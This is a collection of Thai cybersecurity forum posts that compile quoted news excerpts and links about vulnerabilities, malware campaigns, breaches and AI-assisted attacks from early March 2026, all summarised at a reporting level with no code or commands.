      "In the last quarter of 2025, information security researchers published numerous interesting reports on attacks against industrial organizations. Most of them highlight the persistence of long-standing problems: untimely installation of security updates, including on internet-accessible systems; insecure provision of remote access to internal systems; the difficulty of monitoring the security of trusted partners and suppliers; the inability to guarantee 100% protection for traditional operating systems with their inherent information security issues (DLL hijacking, BYOVD, and malware); and the lack of staff preparedness to resist basic social engineering techniques."
      https://ics-cert.kaspersky.com/publications/reports/2026/03/06/apt-and-financial-attacks-on-industrial-organizations-in-q4-2025/

    New Tooling

    Vulnerabilities

    • Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups
      "A critical vulnerability in Nginx UI, tracked as CVE-2026-27944 (CVSS score of 9.8), allows attackers to download and decrypt full server backups without authentication. The flaw poses a serious risk to organizations exposing the management interface, potentially revealing sensitive configuration data, credentials, and encryption keys. “The /api/backup endpoint is accessible without authentication and discloses the encryption keys required to decrypt the backup in the X-Backup-Security response header.” reads the advisory. “This allows an unauthenticated attacker to download a full system backup containing sensitive data (user credentials, session tokens, SSL private keys, Nginx configurations) and decrypt it immediately.”"
      https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html
      https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762
    • Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
      "Exposure management company WatchTowr reports that a recent Cisco Catalyst SD-WAN vulnerability, initially exploited as a zero-day, is now being used more frequently by threat actors. The in-the-wild exploitation of four Cisco Catalyst SD-WAN vulnerabilities came to light in recent weeks. One of them is CVE-2026-20127, which had been exploited as a zero-day in combination with an older vulnerability, CVE-2022-20775, to bypass authentication, escalate privileges, and establish persistence on systems."
      https://www.securityweek.com/recent-cisco-catalyst-sd-wan-vulnerability-now-widely-exploited/

    Malware

    • InstallFix: How Attackers Are Weaponizing Malvertized Install Guides
      "There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system. But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions."
      https://pushsecurity.com/blog/installfix/
      https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/
    • Cyberattacks And Unpredictable Targeting Remain An Iran Risk
      "Cyberattacks launched by Iranian nation-state hackers in reprisal for what the United States has codenamed Operation Epic Fury so far have been evident mainly in their absence. Whether the regime's military or intelligence forces have the inclination or ability to launch such attacks isn't clear. The country continues to operate in a near-total internet blackout initiated for reasons unknown at the start of hostilities by the United States and Israel on Feb. 28, monitoring firm Netblocks reported early Friday."
      https://www.bankinfosecurity.com/cyberattacks-unpredictable-targeting-remain-iran-risk-a-30930
    • AI As Tradecraft: How Threat Actors Operationalize AI
      "Threat actors are operationalizing AI along the cyberattack lifecycle to accelerate tradecraft, abusing both intended model capabilities and jailbreaking techniques to bypass safeguards and perform malicious activity. As enterprises integrate AI to improve efficiency and productivity, threat actors are adopting the same technologies as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations."
      https://www.microsoft.com/en-us/security/blog/2026/03/06/ai-as-tradecraft-how-threat-actors-operationalize-ai/
      https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams
      https://www.bleepingcomputer.com/news/security/microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks/
      https://cyberscoop.com/microsoft-north-korea-ai-operations/
    • Fake CleanMyMac Site Installs SHub Stealer And Backdoors Crypto Wallets
      "A convincing fake version of the popular Mac utility CleanMyMac is tricking users into installing malware. The site instructs visitors to paste a command into Terminal. If they do, it installs SHub Stealer, macOS malware designed to steal sensitive data including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and Telegram sessions. It can even modify wallet apps such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live so attackers can later steal the wallet’s recovery phrase."
      https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets
    • Middle East Conflict Fuels Opportunistic Cyber Attacks
      "Threat actors often take advantage of major global events to fuel interest in their malicious activities. Zscaler ThreatLabz is diligently tracking a surge in cybercriminal activity that capitalizes on the elevated political climate in the Middle East. This increased malicious activity includes discoveries that are directly tied to the ongoing conflict, alongside other related findings."
      https://www.zscaler.com/blogs/security-research/middle-east-conflict-fuels-opportunistic-cyber-attacks
    • Malware Brief: When The Supply Chain Becomes The Attack Surface
      "For a long time, defenders focused on hardening the perimeter: patch your systems, train your users, lock down your endpoints. But as supply-chain threats multiply, attackers are increasingly bypassing perimeter defenses and walking straight in through trusted software, services and dependencies. That’s what makes software supply‑chain attacks so effective. Instead of compromising one company at a time, threat actors target a single vendor, developer account or build system and let trust do the rest of the work for them."
      https://blog.barracuda.com/2026/03/05/malware-brief-supply-chain-attack-surface
      VOID#GEIST: Stealthy Multi-Stage Python Loader With Embedded Runtime Deployment, Startup * Persistence, And Fileless Early Bird APC Injection Into Explorer.exe
      "Securonix Threat Research analyzed a stealthy, multi-stage malware intrusion chain utilizing an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads corresponding to XWorm, XenoRAT, and AsyncRAT. The script establishes persistence by deploying a secondary batch script (spol.bat) into the Windows Startup folder, stages a legitimate embedded Python runtime from python.org, and decrypts encrypted shellcode blobs (new.bin, pul.bin, xn.bin) at runtime using external XOR key material (a.json, p.json, n.json)."
      https://www.securonix.com/blog/voidgeist-stealthy-multi-stage-python-loader/
      https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html
    • Microsoft Reveals ClickFix Campaign Using Windows Terminal To Deploy Lumma Stealer
      "Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command into it."
      https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
      https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
      https://www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
    • Mobile Spyware Campaign Impersonates Israel's Red Alert Rocket Warning System
      "Acronis Threat Research Unit (TRU) has been actively monitoring malware campaigns and threat activity leveraging recent geopolitical developments across the Middle East and abusing these events to deliver malware to individuals. During our investigation, TRU identified a targeted campaign distributing a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications, aimed at Israeli individuals."
      https://www.acronis.com/en/tru/posts/mobile-spyware-campaign-impersonates-israels-red-alert-rocket-warning-system/
      https://www.theregister.com/2026/03/06/spyware_disguised_as_emergency_alert/
      https://hackread.com/hackers-fake-red-alert-rocket-alert-app-spy-israel-users/
    • An Investigation Into Years Of Undetected Operations Targeting High-Value Sectors
      "Since at least 2020, we have observed a cluster of activity targeting high-value organizations across South, Southeast and East Asia. The attacks focus on critical sectors such as aviation, energy, government, law enforcement, pharmaceutical, technology and telecommunications. Unit 42 is tracking this ongoing, previously undocumented activity as CL-UNK-1068. We designate the term UNK to clusters of activity whose affiliation with either nation-state or cybercrime activity we have not yet determined."
      https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/
    • Dark Web Profile: APT41
      "APT41 stands out in the threat landscape because it doesn’t stick to a single playbook. It has been repeatedly linked to both cyber espionage and financially motivated cybercrime, sometimes running those missions side by side. That dual-track model, paired with exploit-driven access and long-dwell intrusions, makes APT41 a high-signal profile for defenders looking to understand how modern operations blend strategy, stealth, and scale."
      https://socradar.io/blog/dark-web-profile-apt41/
    • Iranian APT Infrastructure In Focus: Mapping State-Aligned Clusters During Geopolitical Escalation
      "Tensions between the United States, Israel, and Iran have reached a critical point following a series of diplomatic breakdowns, which led to escalating military exchanges and proxy engagements across the Middle East. History has shown that when hostilities rise to this degree, cyber operations do not lag far behind kinetic activity. They precede it. These operations, whether infrastructure reconnaissance, pre-positioning, or network intrusion, are part of the operational groundwork of modern conflict. Disrupting communications and compromising critical systems can weaken response capabilities long before physical engagement begins. Iranian state-aligned actors have historically targeted energy, financial services, government networks, and defense-related organizations across the U.S., Israel, and allied regions."
      https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters
    • OCRFix Botnet Hides C2 In BNB Smart Chain Contracts
      "OCRFix is a three-stage botnet that stores its C2 URLs inside BNB Smart Chain testnet smart contracts. Each stage queries a contract via JSON-RPC at runtime to get the current C2 domain. To rotate infrastructure, the author updates the contract storage with a single blockchain transaction. Every infected machine follows on next check-in. No binary update required. Initial access is ClickFix -- a fake CAPTCHA that walks the victim through opening Windows Run and pasting a PowerShell command the page has placed in their clipboard."
      https://www.derp.ca/research/ocrfix-etherhiding-botnet/
    • Termite Ransomware Breaches Linked To ClickFix CastleRAT Attacks
      "Ransomware threat actors tracked as Velvet Tempest are using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader malware and the CastleRAT backdoor. Researchers at cyber-deception threat intelligence firm MalBeacon observed the hackers' actions in an emulated organization environment over a period of 12 days. Velvet Tempest, also tracked as DEV-0504, is a threat group that has been involved in ransomware attacks as an affiliate for at least five years."
      https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/

    Breaches/Hacks/Leaks

    • Cognizant TriZetto Breach Exposes Health Data Of 3.4 Million Patients
      "TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people. The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts."
      https://www.bleepingcomputer.com/news/security/cognizant-trizetto-breach-exposes-health-data-of-34-million-patients/
    • 2,622 Valid Certificates Exposed: A Google-GitGuardian Study Maps Private Key Leaks To Real-World Risk
      "When a private key leaks on GitHub or DockerHub, detecting it is easy. What's harder, sometimes impossible, is understanding its real-world impact. Unlike AWS keys or OpenAI tokens, which are tied to their respective service, a leaked private key is just a mathematical object without an obvious owner. Private keys are challenging to attribute at scale: they are used in many different contexts, ranging from SSH authentication to JWT signatures. When one leaks, where do you start assessing the impact? Among leaked private keys, those used in X.509 infrastructure are most critical. They authenticate web servers in HTTPS: a compromised key enables attackers to impersonate websites or intercept data. That's why GitGuardian partnered with Google's researchers to answer a deceptively simple question: what happens when private keys leak?"
      https://blog.gitguardian.com/certificates-exposed-a-google-gitguardian-study/
      https://hackread.com/certificates-fortune-500-gov-exposed-key-leaks/
    • Transport For London Says 2024 Breach Affected 7M Customers, Not 5,000
      "Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk. The BBC reported on Friday that the 2024 intrusion into TfL's systems potentially gave attackers access to a database covering as many as 10 million customers who had interacted with the capital's transport network."
      https://www.theregister.com/2026/03/06/tfl_2024_breach_numbers/

    General News

    • Cyberattack On Mexico's Gov't Agencies Highlight AI Threat
      "For any cyber-defender continuing to deny the impact of AI on attacker efficiency, welcome to Exhibit A. Over the past few months, a small group of hacktivists compromised the computers and networks of at least nine Mexican government agencies, stealing more than 195 million identities and tax records, along with vehicle registrations and more than 2.2 million property records, startup Gambit Security stated in a blog post this week that detailed the attack."
      https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat
    • Backup Strategies Are Working, And Ransomware Gangs Are Responding With Data Theft
      "Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most common claim type at 31%, with frequency rising 15% year over year to 0.47%. Average losses per BEC incident dropped 28% to $27,000, a decline attributed to faster detection and response by affected organizations."
      https://www.helpnetsecurity.com/2026/03/06/cyber-claims-report-ransomware-gangs-data-theft/
    • What Happens When AI Teams Compete Against Human Hackers
      "A cybersecurity competition produced what may be the largest controlled dataset comparing AI-augmented teams to human-only teams on professional-grade offensive security tasks. The event, called NeuroGrid, ran for 72 hours on the Hack The Box platform and drew 1,337 registered human-only teams and 156 registered AI-agent teams competing across 36 challenges in nine security domains at four difficulty levels. AI teams operated through Model Context Protocol with human oversight in the loop. The analysis covers 958 human teams and 120 AI-agent teams that each attempted at least one challenge."
      https://www.helpnetsecurity.com/2026/03/06/cybersecurity-competition-ai-vs-human-hackers/
    • Exploits And Vulnerabilities In Q4 2025
      "The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately. In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025."
      https://securelist.com/vulnerabilities-and-exploits-in-q4-2025/119105/
    • Viral AI, Invisible Risks: What OpenClaw Reveals About Agentic Assistants
      "The name OpenClaw might not immediately be recognizable, partly because it has undergone several name changes, from Clawdbot to Moltbot, then finally to OpenClaw. Yet one thing is certain: This new digital assistant feels genuinely groundbreaking. It remembers past interactions, keeps data on the user’s device, and adapts to individual preferences, making it feel like a leap in capabilities reminiscent of the first ChatGPT release. At the same time, its development is not without caveats, as there have been media headlines that warn of its potential as a security nightmare."
      https://www.trendmicro.com/en_us/research/26/b/what-openclaw-reveals-about-agentic-assistants.html
    • AI Agents Now Help Attackers, Including North Korea, Manage Their Drudge Work
      "AI agents allow cybercriminals and nation-state hackers to outsource the "janitorial-type work" needed to plan and carry out cyberattacks, according to Sherrod DeGrippo, Microsoft's GM of global threat intelligence. North Korea is taking advantage. This includes tasks such as performing reconnaissance on compromised computers, and standing up and managing attack infrastructure - which may not sound as thrilling as plotting and carrying out digital intrusions, but are real-world criminal use cases for agentic AI that should make threat hunters sit up and take notice."
      https://www.theregister.com/2026/03/08/deploy_and_manage_attack_infrastructure/

    อ้างอิง
    Electronic Transactions Development Agency (ETDA) 3709bc93-b715-4aa5-80ff-2b994be63a58-image.png

    โพสต์ใน Cyber Security News
  • Cyber Threat Intelligence 06 March 2026

    Vulnerabilities

    Malware

    • UAT-9244 Targets South American Telecommunication Providers With Three New Malware Implants
      "AT-9244 used dynamic-link library (DLL) side-loading to activate multiple stages of their infection chain. The actor executed “wsprint[.]exe”, a benign executable that loaded the malicious DLL-based loader “BugSplatRc64[.]dll”. The DLL reads a data file named “WSPrint[.]dll” from disk, decrypts its contents, and executes them in memory to activate TernDoor, the final payload. TernDoor is a variant of CrowDoor, a backdoor deployed in recent intrusions linked to China-nexus APTs such as FamousSparrow and Earth Estries. CrowDoor is a variant of SparrowDoor, another backdoor attributed to FamousSparrow. CrowDoor has also been observed in previous Tropic Trooper intrusions, indicating a close operational relationship with FamousSparrow."
      https://blog.talosintelligence.com/uat-9244/
      https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/

    • ClipXDaemon: Autonomous X11 Clipboard Hijacker Delivered Via Bincrypter-Based Loader
      "In early February 2026, Cyble Research & Intelligence Labs (CRIL) identified a new Linux malware strain delivered through a loader structure previously associated with ShadowHS activity. While ShadowHS samples deployed post-exploitation tooling, the newly observed payload is operationally different. We have named it ClipXDaemon, an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments."
      https://cyble.com/blog/clipxdaemon-autonomous-x11-clipboard-hijacker/

    • New BoryptGrab Stealer Targets Windows Users Via Deceptive GitHub Pages
      "We recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. We designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which we refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell (SSH) tunnel to enable comunication with the attacker."
      https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html

    • Bing AI Promoted Fake OpenClaw GitHub Repo Pushing Info-Stealing Malware
      "Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services. Due to its widespread local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub."
      https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

    • Wikipedia Hit By Self-Propagating JavaScript Worm That Vandalized Pages
      "The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes."
      https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/

    • APT36: A Nightmare Of Vibeware
      "Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control."
      https://businessinsights.bitdefender.com/apt36-nightmare-vibeware
      https://www.darkreading.com/cyberattacks-data-breaches/nation-state-actor-ai-malware-assembly-line
      https://www.bankinfosecurity.com/nation-state-hackers-play-vibes-a-30920
      https://hackread.com/pakistan-apt36-indian-govt-networks-ai-vibeware/

    • Seedworm: Iranian APT On Networks Of U.S. Bank, Airport, Software Company
      "The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region. A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity."
      https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
      https://www.theregister.com/2026/03/05/mudywater_backdoor_us_networks/

    • FBI Targeted With ‘suspicious’ Activity On Its Networks
      "The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details. “The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”"
      https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/

    • LIMINAL PANDA: China’s Emerging Espionage Threat In The Semiconductor And Technology Sectors
      "LIMINAL PANDA, a suspected China-nexus cyber-espionage actor, has recently emerged as an active player in the global threat landscape. The group began operating around 2020 and has focused its intelligence collection on a range of high-value targets in East Asia, Southeast Asia, and Western nations engaged in research and development of advanced technologies, including semiconductors, defense technologies, and telecommunications. While not a well-known actor (yet) like APT41 or Mustang Panda, LIMINAL PANDA shows an accelerating trajectory of evolution in capabilities, experimenting with the convergence of more traditional phishing criminal enterprises with sophisticated cloud exploitation and supply chain compromise."
      https://brandefense.io/blog/liminal-panda-apt-group/

    • Breaches/Hacks/Leaks

    • New Jersey County Says Malware Attack Took Down Phone Lines, IT Systems
      "One of the largest counties in New Jersey is dealing with a cyberattack that disrupted the phone lines and IT systems used across government offices. Passaic County, home to nearly 600,000 people in Northern New Jersey, published a statement on Wednesday evening warning residents that it is aware of a “malware attack” affecting county IT systems and phone lines. “Our team is actively working with federal and state officials to investigate and contain the issue,” the county said."
      https://therecord.media/new-jersey-county-says-malware-attack-took-down-phones

    General News

    อ้างอิง
    Electronic Transactions Development Agency (ETDA) 7e9f3751-2cc2-4253-ad15-f3fd6806c953-image.png

    โพสต์ใน Cyber Security News
  • โดรนโจมตีศูนย์ข้อมูล AWS ในตะวันออกกลางกระทบบริการคลาวด์เป็นวงกว้าง

    9c4930b2-08b0-4329-8380-1c6dbfb964cb-image.png โดรนโจมตีศูนย์ข้อมูล AWS ในตะวันออกกลางกระท.png

    สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 87c733d2-a6cf-4168-87d4-865392fa8602-image.png

    โพสต์ใน Cyber Security News